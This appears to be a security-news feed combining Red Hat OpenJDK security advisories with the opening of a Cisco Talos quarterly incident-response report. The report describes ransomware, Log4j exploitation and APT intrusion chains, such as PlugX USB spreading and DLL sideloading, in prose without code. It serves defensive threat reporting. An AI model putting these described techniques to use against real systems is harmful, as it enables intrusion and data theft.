Enterprise Linux Workstation (v. 7):  Source:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.src.rpm  x86_64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.x86_64.rpm  Red Hat Enterprise Linux Workstation Optional (v. 7):  noarch:   java-1.8.0-openjdk-javadoc-1.8.0.332.b09-1.el7_9.noarch.rpm   java-1.8.0-openjdk-javadoc-zip-1.8.0.332.b09-1.el7_9.noarch.rpm  x86_64:   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.x86_64.rpm  These packages are GPG signed by Red Hat for security. Our key and   details on how to verify the signature are available from   https://access.redhat.com/security/team/key/  7. References:  https://access.redhat.com/security/cve/CVE-2022-21426   https://access.redhat.com/security/cve/CVE-2022-21434   https://access.redhat.com/security/cve/CVE-2022-21443   https://access.redhat.com/security/cve/CVE-2022-21476   https://access.redhat.com/security/cve/CVE-2022-21496   https://access.redhat.com/security/updates/classification/#important  8. Contact:  The Red Hat security contact is <secalert@redhat.com>. More contact   details at https://access.redhat.com/security/team/contact/  Copyright 2022 Red Hat, Inc.   -----BEGIN PGP SIGNATURE-----   Version: GnuPG v1  iQIVAwUBYmbJhNzjgjWX9erEAQhPuw//Zb0N99JyndrQMfmjrUw7kGh4hagh5/6v   EmZbNfmYZ3WtF7kOdNWzJ1bVnND5FsUZD1gHKz12ico5O+L+3yfkvqbPZe6F8DtE   XM391+BBLRe5A27rArHPpx1gM76N01BO7SBdawDXR7ZOHw0qF8nWa7AGzmzbNAYx   mn6RXFVvmlCLGDI83/aRY5wi7WPssQ0FAj4HB5ngeYLMEzzlQ63bQM6zoysW5aD9   K/Y0b1b/zpdawLaHJSCMLGPjNd5rRgBmQtNK94OVITMcgbYBEvQU9buDq9NoGrbK   Qp+MXaweMYtFJoDVP3PqiiZdu20nagfH8sfnBpw6LXqh2yWjvrSPJpniNm0jRPLk   YBReD1bLSk8JpQkTKjdSq8S6hQlNqzTHukNFTi4O7wkI031h2G/EV9kGf3nF7/uX   hGiwl2WAgwfM1CnFm9keiVZYj5aGHsLaxHqe0At8SU0c60UqAqJ4Ms924XKAkxrK   5+qAErYzOENysGss43zcwW2ru585gJzQmXUwLZmQ4AKeNp19xSwBro4RFJfKtZgv   N6rukoMIr3X9AE++k7iNTYh3c5wWoExU3yri8TYaap8sCk+Uys0kLHhMTW7eXH9X   U81tTAy5JVvLLmlijIe4/exnpdBXcJTeruKpNX7NT6BR/kQtApDORJcLoOK5Eowg   kmZ0zK+vqwM=   =TsnX   -----END PGP SIGNATURE-----   --   RHSA-announce mailing list   RHSA-announce@redhat.com   https://listman.redhat.com/mailman/listinfo/rhsa-announce  `

Red Hat Security Advisory 2022-1487-01

Red Hat Security Advisory 2022-1488-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.

`-----BEGIN PGP SIGNED MESSAGE-----   Hash: SHA256  =====================================================================   Red Hat Security Advisory  Synopsis: Important: java-1.8.0-openjdk security update   Advisory ID: RHSA-2022:1488-01   Product: Red Hat Enterprise Linux   Advisory URL: https://access.redhat.com/errata/RHSA-2022:1488   Issue date: 2022-04-25   CVE Names: CVE-2022-21426 CVE-2022-21434 CVE-2022-21443   CVE-2022-21476 CVE-2022-21496   =====================================================================  1. Summary:  An update for java-1.8.0-openjdk is now available for Red Hat Enterprise   Linux 8.1 Update Services for SAP Solutions.  Red Hat Product Security has rated this update as having a security impact   of Important. A Common Vulnerability Scoring System (CVSS) base score,   which gives a detailed severity rating, is available for each vulnerability   from the CVE link(s) in the References section.  2. Relevant releases/architectures:  Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64  3. Description:  The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime   Environment and the OpenJDK 8 Java Software Development Kit.  Security Fix(es):  * OpenJDK: Defective secure validation in Apache Santuario (Libraries,   8278008) (CVE-2022-21476)  * OpenJDK: Unbounded memory allocation when compiling crafted XPath   expressions (JAXP, 8270504) (CVE-2022-21426)  * OpenJDK: Improper object-to-string conversion in   AnnotationInvocationHandler (Libraries, 8277672) (CVE-2022-21434)  * OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)   (CVE-2022-21443)  * OpenJDK: URI parsing inconsistencies (JNDI, 8278972) (CVE-2022-21496)  For more details about the security issue(s), including the impact, a CVSS   score, acknowledgments, and other related information, refer to the CVE   page(s) listed in the References section.  4. Solution:  For details on how to apply this update, which includes the changes   described in this advisory, refer to:  https://access.redhat.com/articles/11258  All running instances of OpenJDK Java must be restarted for this update to   take effect.  5. Bugs fixed (https://bugzilla.redhat.com/):  2075788 - CVE-2022-21426 OpenJDK: Unbounded memory allocation when compiling crafted XPath expressions (JAXP, 8270504)   2075793 - CVE-2022-21443 OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)   2075836 - CVE-2022-21434 OpenJDK: Improper object-to-string conversion in AnnotationInvocationHandler (Libraries, 8277672)   2075842 - CVE-2022-21476 OpenJDK: Defective secure validation in Apache Santuario (Libraries, 8278008)   2075849 - CVE-2022-21496 OpenJDK: URI parsing inconsistencies (JNDI, 8278972)  6. Package List:  Red Hat Enterprise Linux AppStream E4S (v. 8.1):  Source:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_1.src.rpm  aarch64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_1.aarch64.rpm  noarch:   java-1.8.0-openjdk-javadoc-1.8.0.332.b09-1.el8_1.noarch.rpm   java-1.8.0-openjdk-javadoc-zip-1.8.0.332.b09-1.el8_1.noarch.rpm  ppc64le:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_1.ppc64le.rpm  s390x:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_1.s390x.rpm  x86_64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_1.x86_64.rpm  These packages are GPG signed by Red Hat for security. Our key and   details on how to verify the signature are available from   https://access.redhat.com/security/team/key/  7. References:  https://access.redhat.com/security/cve/CVE-2022-21426   https://access.redhat.com/security/cve/CVE-2022-21434   https://access.redhat.com/security/cve/CVE-2022-21443   https://access.redhat.com/security/cve/CVE-2022-21476   https://access.redhat.com/security/cve/CVE-2022-21496   https://access.redhat.com/security/updates/classification/#important  8. Contact:  The Red Hat security contact is <secalert@redhat.com>. More contact   details at https://access.redhat.com/security/team/contact/  Copyright 2022 Red Hat, Inc.   -----BEGIN PGP SIGNATURE-----   Version: GnuPG v1  iQIVAwUBYmbJfNzjgjWX9erEAQgiKxAAoi0SREMKqTnKqWglR369v/Ni6B3d7xxj   glSaMGBkgf+2xZkI4eXqAr1EjpzNtTxWAvP6ORU+G03K38lhjKW77cJVCWntN83m   QpQ2pE936Lgcq03dJYX8KcVWutFS3WKeLXFdwlVGFxTvMMa+3BTYDMMrQWgahjet   jZAb1xqEYFJJ/MQ8hAIaZeHR5aM+G+BMhGFbNsHD+HVeLFl8vfgzJGNPQ2C9HJS8   9iZiaKRKEF4otzu+qYG7FPuZYqjE41xEzlQvmDcADBuD+CJUq9s1uf4dBKwhoAdc   E3GYmziH/WIMOKs1q/vyT8otnGZLd8V2PJTJYgMl33y/GWbMycFP5+VUaN5ag+je   36iBwmWsoVtDUz2UYrZJn28mUPGBEeaaFJ7+YFYpoo1hS3xwoNm6l8qB+LYJT8sk   v2Wh0IZolzQHEYhFYSapbpFciVOUaZZ7xfZ9k7MUJilT6oLj25kgrE/YLBF1xG12   KqQxiFDJ/r1Lh0P1ZaBc30gdsGMmQZ6sxJD0AJsLTq+zd6WJA9/bna4d/e5nsNPw   kGmazfEukC3vOUVV2wQ1QqihHUhx6ZJNyZb/KdO6oj5RWSu1t/wVuovqDZyeMNMs   /w7rQiTGU9q2HgggRq0EpuoN344t/dP94IJKESffvZDdSYLmaeVsIXHJ8RzYHS9M   tpSd0s3muU8=   =bWrm   -----END PGP SIGNATURE-----   --   RHSA-announce mailing list   RHSA-announce@redhat.com   https://listman.redhat.com/mailman/listinfo/rhsa-announce  `

Red Hat Security Advisory 2022-1488-01

Red Hat Security Advisory 2022-1489-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.

`-----BEGIN PGP SIGNED MESSAGE-----   Hash: SHA256  =====================================================================   Red Hat Security Advisory  Synopsis: Important: java-1.8.0-openjdk security update   Advisory ID: RHSA-2022:1489-01   Product: Red Hat Enterprise Linux   Advisory URL: https://access.redhat.com/errata/RHSA-2022:1489   Issue date: 2022-04-25   CVE Names: CVE-2022-21426 CVE-2022-21434 CVE-2022-21443   CVE-2022-21476 CVE-2022-21496   =====================================================================  1. Summary:  An update for java-1.8.0-openjdk is now available for Red Hat Enterprise   Linux 8.2 Extended Update Support.  Red Hat Product Security has rated this update as having a security impact   of Important. A Common Vulnerability Scoring System (CVSS) base score,   which gives a detailed severity rating, is available for each vulnerability   from the CVE link(s) in the References section.  2. Relevant releases/architectures:  Red Hat Enterprise Linux AppStream EUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  3. Description:  The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime   Environment and the OpenJDK 8 Java Software Development Kit.  Security Fix(es):  * OpenJDK: Defective secure validation in Apache Santuario (Libraries,   8278008) (CVE-2022-21476)  * OpenJDK: Unbounded memory allocation when compiling crafted XPath   expressions (JAXP, 8270504) (CVE-2022-21426)  * OpenJDK: Improper object-to-string conversion in   AnnotationInvocationHandler (Libraries, 8277672) (CVE-2022-21434)  * OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)   (CVE-2022-21443)  * OpenJDK: URI parsing inconsistencies (JNDI, 8278972) (CVE-2022-21496)  For more details about the security issue(s), including the impact, a CVSS   score, acknowledgments, and other related information, refer to the CVE   page(s) listed in the References section.  4. Solution:  For details on how to apply this update, which includes the changes   described in this advisory, refer to:  https://access.redhat.com/articles/11258  All running instances of OpenJDK Java must be restarted for this update to   take effect.  5. Bugs fixed (https://bugzilla.redhat.com/):  2075788 - CVE-2022-21426 OpenJDK: Unbounded memory allocation when compiling crafted XPath expressions (JAXP, 8270504)   2075793 - CVE-2022-21443 OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)   2075836 - CVE-2022-21434 OpenJDK: Improper object-to-string conversion in AnnotationInvocationHandler (Libraries, 8277672)   2075842 - CVE-2022-21476 OpenJDK: Defective secure validation in Apache Santuario (Libraries, 8278008)   2075849 - CVE-2022-21496 OpenJDK: URI parsing inconsistencies (JNDI, 8278972)  6. Package List:  Red Hat Enterprise Linux AppStream EUS (v. 8.2):  Source:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_2.src.rpm  aarch64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_2.aarch64.rpm  noarch:   java-1.8.0-openjdk-javadoc-1.8.0.332.b09-1.el8_2.noarch.rpm   java-1.8.0-openjdk-javadoc-zip-1.8.0.332.b09-1.el8_2.noarch.rpm  ppc64le:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_2.ppc64le.rpm  s390x:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_2.s390x.rpm  x86_64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_2.x86_64.rpm  These packages are GPG signed by Red Hat for security. Our key and   details on how to verify the signature are available from   https://access.redhat.com/security/team/key/  7. References:  https://access.redhat.com/security/cve/CVE-2022-21426   https://access.redhat.com/security/cve/CVE-2022-21434   https://access.redhat.com/security/cve/CVE-2022-21443   https://access.redhat.com/security/cve/CVE-2022-21476   https://access.redhat.com/security/cve/CVE-2022-21496   https://access.redhat.com/security/updates/classification/#important  8. Contact:  The Red Hat security contact is <secalert@redhat.com>. More contact   details at https://access.redhat.com/security/team/contact/  Copyright 2022 Red Hat, Inc.   -----BEGIN PGP SIGNATURE-----   Version: GnuPG v1  iQIVAwUBYmbJcdzjgjWX9erEAQiaBBAAhsv+re6Xov/rKez1Zu38eQ3HX4oeHWVc   W/em2WfOnx52qXAoSOVSXOil7+b36Og8y+q/aTbfVqVYJgdvuXysGpbr5ny2M9Yo   JKvCMtvY01nQ7A1yZqejxBVmVTRpcb0uOJWnV1c2Ma9dozTNw++7bMybCeTVuU9H   A8R9l2gOnf82rQ0cLyktwBSicoPAC7B3HmMmE3K+D04bgzlBwQUJniLA7oE+Z5HC   yA0nZiH629g0DBVpEEhEfsVjNbc+qAHrXk0r0FV6BaNCvZqqsk48+ma+jcMDgfJe   Uos/y3VRf31+msru1a2bhHRVUcMVvLjqD+hAHZV/WIf++YqkkojG5sSfdTL/jxrR   RTTB0vvfaPZJH2a7STkGqfAeKTWjWXBjVf9UeectEKPwW00PTgTTBEQ3I/22qADB   x+/MF382C4WhAVmviKke1tXfn0cJIuIJdPfnGuoSeNPxnIzw4hb385OeAInQdTkK   HgdVtJXmHSqG8DU5gaP9r5LCeU3GtogBwj9ARTZ2z5b2dbOOZSslzH80PUkjdi4w   /BTlG0LTgGj06lgfX64GOhTadEsVTHuNaKFfk2a2781ETLF3Cv67fMrLl2jfM70r   +Npu8oJ/sBX5TK4Whv+hEDZBQcBUDge5xEDJ2J/m4MxI3XyAVkl88CT1tuGjYbS7   nGyAfWdwLoY=   =0y1v   -----END PGP SIGNATURE-----   --   RHSA-announce mailing list   RHSA-announce@redhat.com   https://listman.redhat.com/mailman/listinfo/rhsa-announce  `

Red Hat Security Advisory 2022-1489-01

Ransomware continues as the top threat, while a novel increase in APT activity emerges




By Caitlin Huey.
Ransomware was still the top threat Cisco Talos Incident Response (CTIR) saw in active engagements this quarter, continuing a trend that started in 2020. As mentioned in the 2021...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

**Ransomware continues as the top threat, while a novel increase in APT activity emerges**

![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_m4GPG0IRtDZT8UPmsyLr0gHPUOZG1xe-nqkh_-htxekZ2VwXvCDwQ8BYNRdgArcMmYzlZFnuF0jeHt6cX635yT0RoREd4bm8DmU2JUzXrdw3rsGmOB8tMP6AvQ1RHXqXJXrFF_aM73nFmVAh8Q3U1yVoIP7sM9E5QwxT2wmK99_PaSTG7iyWXvVm/s16000/TIR_quarterly_trends_banner.jpg)

_By Caitlin Huey._

Ransomware was still the top threat Cisco Talos Incident Response (CTIR) saw in active engagements this quarter, continuing a trend that started in 2020. As mentioned in the 2021 year-in-review report, CTIR continues to deal with an expanding set of ransomware adversaries and major cybersecurity incidents affecting organizations worldwide.  

![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUDkQFdigkJg7M2nBf3gqfEKhHJO6U55wD02LN9awloHiV14wGiJp9DeUDcT8UHImiNQsCzeR08Omtjk6FCRRyYYrRg4ffp-oVJ793zZLouMKN3LHw8G0JAoUG_VtyM_3C-yISYFTlWoTN7Uc0DAUawRa3FyPe6Rz4XBddpnrDWdE8aSqRv3HRC_mL/w200-h48/blog-onepager-button.jpg)

The first quarter of 2022 also featured an increase in engagements involving advanced persistent threat (APT) activity. This included Iranian state-sponsored MuddyWater APT activity, China-based Mustang Panda activity leveraging USB drives to deliver the PlugX remote access trojan (RAT), and a suspected Chinese adversary dubbed “Deep Panda” exploiting Log4j. 

**Targeting**

A wide variety of verticals were targeted, including education, energy, financial services, health care, industrial production and equipment, local government, manufacturing, real estate, telecommunications and utilities. The top targeted vertical was telecommunications, following a trend where it was among the top targeted verticals in the previous quarter, closely followed by organizations in the education and government sectors. 

**Threats**

Ransomware continued to comprise the majority of threats CTIR responded to. No one ransomware family was observed twice in incidents that closed out this quarter. This is indicative of a trend toward greater democratization of ransomware adversaries that Talos began observing last year. This quarter also saw the appearance of emerging ransomware families, including Cerber (aka CerberImposter), Entropy and Cuba. There were also high-profile ransomware families, such as Hive and Conti. 

CTIR observed ransomware adversaries exfiltrating sensitive data supporting double extortion as another method to further compel victims to pay the ransom, a continuation of a trend that began in the winter of 2019. For example, in an Entropy ransomware engagement affecting a local government organization, CTIR identified traffic and activity associated with mega\[.\]nz, a utility commonly used for file transfer and data exfiltration. It was first observed executing from the following path: "C:\\Users\\admin\\AppData\\Local\\MEGAsync\\MEGAsync.exe".  

After ransomware, the next most commonly observed threat this quarter included exploitation of Log4j, the Apache logging utility commonly used by organizations globally. Adversaries have continued to exploit Log4j (CVE-2021-44228, CVE-2021-45046, and related vulnerabilities) since the security flaws were initially published in December 2021. In January 2022, CTIR started to observe a growing number of engagements in which adversaries are attempting to exploit Loj4j in vulnerable VMware Horizon servers. 

In one engagement affecting an education institution, CTIR found evidence of PowerShell scripts including a line that killed the process “ws\_TomcatService.exe”, a key parent process in commonly observed malicious Log4j activity. The combination of the timeframe and the unpatched, vulnerable state of the VMware Horizon server suggests that Log4j exploitation was a probable root cause of the compromise. The adversary also installed cryptocurrency miners; conducted reconnaissance with Bloodhound, an application used to enumerate relations within Active Directory (AD); created at least one local “DomainAdmin” account; and leveraged remote desktop protocol (RDP) for potential lateral movement. 

**Advanced persistent threats**

As mentioned above, CTIR observed a novel increase in APT activity in engagements compared to previous quarters. This includes activity associated with Iranian state-sponsored MuddyWater, China-based Mustang Panda deploying the PlugX RAT, and a suspected Chinese state-sponsored actor dubbed Deep Panda leveraging Log4j. 

For example, a health care organization was affected by threat activity associated with Deep Panda in which the adversary exploited Log4j to deploy a custom backdoor. CTIR initially observed a PowerShell command that downloaded three additional files — “1.bat”, “syn.exe” and “l.dll” — from the attacker’s server, which has been linked to the adversary by other security firms. The PowerShell script executes “1.bat,” which subsequently executes “syn.exe” and proceeds to delete all three files from the disk. The “syn.exe” file creates a service set to autorun and is launched via “svchost.exe”. The “1.dll” file is packed with Themida, which is used to detect monitoring programs that may be used for malware reversing.    

In another engagement affecting a telecommunications organization, CTIR’s research provided moderate to high confidence that several of the indicators of compromise (IOCs) and tactics, techniques and procedures (TTPs) discovered were linked to Mustang Panda. The initial compromise was determined to be due to a malware-infected USB connected to corporate resources that subsequently deployed PlugX, a RAT commonly deployed by Mustang Panda that steals credentials from compromised machines. After the USB was connected to the corporate environment for approximately one hour, a hidden directory was created within “C:\\ProgramData” containing files associated with PlugX. The variant can uniquely spread via USB, which distinguishes it from other PlugX variants. This PlugX variant creates a hidden folder named “RECYCLE.BIN” and copies three files: a benign EXE, a loader DLL and an encrypted DAT file. The malware hides all of the folders in the root directory and creates LNK files for each one in order to deceive the victim. In this instance, the malware used legitimate Avast-signed executables to sideload a malicious PlugX DLL.  

**Initial vectors**

